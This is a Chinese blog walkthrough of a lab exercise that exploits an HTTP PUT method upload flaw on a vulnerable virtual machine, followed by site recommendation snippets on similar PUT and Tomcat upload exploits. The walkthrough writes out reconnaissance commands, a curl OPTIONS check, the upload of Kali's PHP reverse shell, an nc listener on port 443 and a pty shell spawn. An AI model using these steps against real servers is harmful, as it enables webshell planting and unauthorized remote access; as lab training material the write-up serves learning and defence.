PUT中间件上传漏洞

最新推荐文章于 2024-05-02 13:31:38 发布
最新推荐文章于 2024-05-02 13:31:38 发布
阅读量2.4k 收藏 8
点赞数
分类专栏: Web漏洞利用 文章标签: web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/112574462
版权

先介绍一下PUT上传漏洞的原理

我们常见的中间件有apache,tomcat,IIS,weblogic(其实就是web容器),这些中间件可以设置支持的HTTP方法。每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到对应的服务器上。

靶机搭建

链接:https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A
提取码:lsq0

漏洞复现

  1. 使用netdiscover发现存活主机
netdiscover -i eth0

在这里插入图片描述

  1. 使用nmap对靶机进行服务等信息的探测
nmap -sV 192.168.75.158
  • 发现该目标使用的是lighttpd这个中间件
    在这里插入图片描述
  1. 使用dirb对网站进行深一步的信息挖掘
dirb http://192.168.75.158
  • 发现了一个test的目录
    在这里插入图片描述
  • 登录此目录发现没有任何可利用的信息
    在这里插入图片描述
  1. 使用OWASP_ZAP对该test网站进行扫描,发现其存在一个put漏洞
    在这里插入图片描述
  • 再使用curl命令,发送数据报文检验这个漏洞
  • 注意:要是现实中扫描器不能查看到该漏洞,我们也要有这种注入思路
curl -v -X OPTIONS http://192.168.75.158/test

发现允许使用PUT上传文件,初步验证存在PUT上传漏洞
在这里插入图片描述

  1. 这样我们就可以上传一个webshell到此目录中
cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php
  • 编辑shell.php的内容,这里要监听的端口我设置为443
    在这里插入图片描述
  1. 使用firefox的poster插件上传webshell,旧版的firefox才有poster插件
  • URL中填写http://靶机地址/test/要保存的文件名,这里是rshell.php
  • 选择shell.php的所在位置
  • 点击PUT上传
    在这里插入图片描述
  1. 上传成功后,在kali中开启一个443的监听端口
nc -nlvp 443
  • 点击rshell.php,反弹给我们了一个shell
  • 输入python -c "import pty;pty.spawn(’/bin/bash’)"优化终端
  • 成功渗入系统
    在这里插入图片描述

总结:在实战中,PUT上传漏洞是很常见的一个漏洞,我们每时每刻都要有这么一个思维。

平凡的学者
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web通用漏洞--文件上传
weixin_74985952的博客
06-20 246
文件上传安全指的是攻击者通过利用上传实现后门的写入连接后门进行权限控制的安全问题,对于如何确保这类安全问题,一般会从原生态功能中的文件内容,文件后缀,文件类等方面判断,但是漏洞可能不仅在本身的代码验证逻辑中出现安全问题,也会在语言版本,语言函数,中间件,引用的第三方编辑器等存在缺陷地方配合利用。另外文件上传也有多个存储逻辑,不同的文件存储方案也会给攻击者带来不一样的挑战!靶场。
CTF-PUT上传漏洞
不知名白帽的博客
05-27 756
CTF-PUT上传漏洞,实验环境:kali(192.168.20.128),靶机(192.168.20.137)。进行信息探测,漏洞扫描未发现有效信息后,测试PUT漏洞,发现存在PUT漏洞,下载插件Poster(RESTClient),然后上传大马反弹shell
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
最新发布
weixin_45653478的博客
05-02 1114
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据写入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件写入任意位置,从而实现任意文件写入。
文件上传漏洞详解
zxcvbnmasdflzl的博客
06-27 851
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果.
文件上传漏洞
weixin_58954236的博客
09-02 1254
文件上传Web 应用必备功能之一,如,头像上传,附件分享等。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上传漏洞
文件上传之IIS—put漏洞
一个普普通通的博客
03-16 4617
iis—put漏洞
【文件上传漏洞-02】利用PUT方法上传文件—以Apache为例
m0_64378913的博客
05-31 6809
目录1 http协议请求方法概述2 Apache开启PUT请求方法的过程2.1 实验环境2.3 查询已开启的请求类2.3 开启put方法3 文件上传漏洞利用3.1 上传PHP探针3.2 上传WebShell4 总结参考文章 1 http协议请求方法概述 具体http/https协议及通信过程可以参考文章《【基础协议】HTTP/HTTPS协议及其工作流程》 常见的请求方法及概述 GET:向特定的资源发出请求。 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。PO
SickOS靶机——PUT方式上传漏洞、版本提权
KUKULI233的博客
12-22 906
主机发现 扫描端口 扫描端口服务 上了一下网站,发现并没有什么可用信息 查找网站目录 查找网站目录 发现test下有文件 尝试看看此网页有没有PUT方法 Burp抓包修改GET为OPTIONS 发现有PUT方法 在请求头中输入PUT /test/hahaha.php HTTP/1.1,这将会通过PUT请求上传hahaha.php文件到test目录下,然后在请求体中粘贴一下恶意代码。  ...
第一节 中间件解析漏洞-IIS6.0-01
09-15
IIS6.0 PUT上传原理 IIS6.0 PUT上传原理基于WebDAV协议,该协议基于HTTP1.1协议的通信协议,使得HTTP支持PUT、MOVE、COPY、DELETE方法。攻击者可以通过OPTIONS方法探测IIS服务器是否存在PUT漏洞,然后使用PUT方法...
IISPUT漏洞演示.avi
07-16
IISPUT漏洞演示.avi
IISPUT漏洞扫描器
10-03
IISPUT漏洞,全称为Microsoft IIS PUT上传漏洞,是由于微软Internet Information Services(IIS)服务器在处理PUT请求时的一个安全缺陷。这个漏洞在2003年前后被发现,主要是由于IIS服务器在某些情况下允许未经授权...
iOS开发之如何通过PUT请求上传数据
09-01
PUT请求在iOS开发中并不像POST请求那样常见,但在某些特定场景下,服务器可能需要使用PUT来处理数据上传。PUT请求的基本概念是让客户端指定一个资源的URI,并将该资源的内容作为请求体发送到服务器,这与POST请求的...
IOS开发教程之put上传文件的服务器的配置及实例分享
09-04
在iOS开发中,上传文件是一项常见的任务,而PUT方法常用于更新或替换服务器上的资源。本文将详细讲解如何配置服务器以支持PUT请求,并提供一个实际的iOS上传文件的实例。 首先,了解HTTP中的几种常见方法: 1. GET...
PUT漏洞实战
qq_23347209的博客
06-06 612
发现开放了22和80端口 浏览器打开站点,大概是这样的↓ 发现敏感目录👇 并没有发现什么有用的信息 parrot选择owasp-zap进入 开始主动扫描👇 发现了存在X-Frame-Options Header Not Set漏洞 以使⽤⼀个透明的、不可见的iframe,覆盖在⽬标⽹页上,然后诱使⽤户在该⽹页上进⾏操作,通过调整iframe页⾯的位置,可以诱使⽤户恰好点击iframe页⾯的⼀些功能性按钮上,导致被劫持。【不过本靶机实验用不到,了解一下😄O(∩_∩)O】 关键:允许使用PU...
CTF—攻防练习之HTTP—18PUT上传漏洞
mutou990的博客
07-31 1761
主机:192.168.56.103 靶机:192.168.56.105 中间件PUT漏洞 包括apache,tomcat,IIS等中间件设置支持的HTTP方法(get,post,head,delete,put等) 每一个开放了HTTP方法都有其对应功能,PUT方法可以直接从客户机上传文件到服务器,如果中间件开放了 HTTP中的PUT方法,那么就可以利用上传webshell到服务器对应目录 一、信息探测 扫描靶机端口: 然后常规方法nikto -host ,dirb探测敏感文件,owasp zap扫web
Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615)复现
weixin_47498728的博客
01-06 878
tomcat本身不允许上传 jsp 文件,但是1.jsp/ 加了 / 就不是 jsp 文件,所以文件可以成功上传。系统保存文件时因为不能存在/字符,所以/被忽略了,所以文件名从 1.jsp/ -> 1.jsp,至此jsp文件完成了上传并保存。
【burpsuite安全练兵场-服务端8】文件上传漏洞-7个实验(全)
热门推荐
01-10 1万+
【BP靶场portswigger-服务端8-文件上传漏洞】7个实验-万文详细步骤
http的PUT、DELETE不安全?
u014644574的博客
12-19 9624
本文主要记录我们的讨论过程及结论,具体测试代码就不贴了。 一、背景 最近研发让我开一下服务器的put、delete方法,被我以不安全的http方法给拒绝了。 研发表示我很无理,put怎么就是不安全的了,在他看来,put和post只是语义上的不同。如果put是不安全的方法,那么post也是不安全的方法了。 网上的说法也是分为两派,一派说这些都是不安全的方法,要关掉;另一派说它们只是语义上的区别,不存在安不安全。 二、一探究竟 经过我和研发各自编写测试用例来论证后,我明白了为什么会有这样的分歧:我是
【实战系列3】IIS PUT文件上传漏洞GetShell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
04-10 2290
IIS(Internet Information Services)PUT文件上传漏洞是一种安全漏洞,影响微软的IIS服务器。它允许攻击者通过HTTP PUT请求上传任意文件到服务器上,从而可能导致恶意文件的上传和执行,可能引发远程代码执行攻击,导致服务器被攻陷。
IIS6.0中间件解析漏洞与PUT上传技术解析
"IIS6.0中间件的解析漏洞及PUT上传原理" 在网络安全领域,中间件解析漏洞是常见的安全问题之一,特别是在旧版本的Web服务器软件中,如IIS6.0。本节主要讲解了IIS6.0中间件的一个特定解析漏洞以及利用PUT方法进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值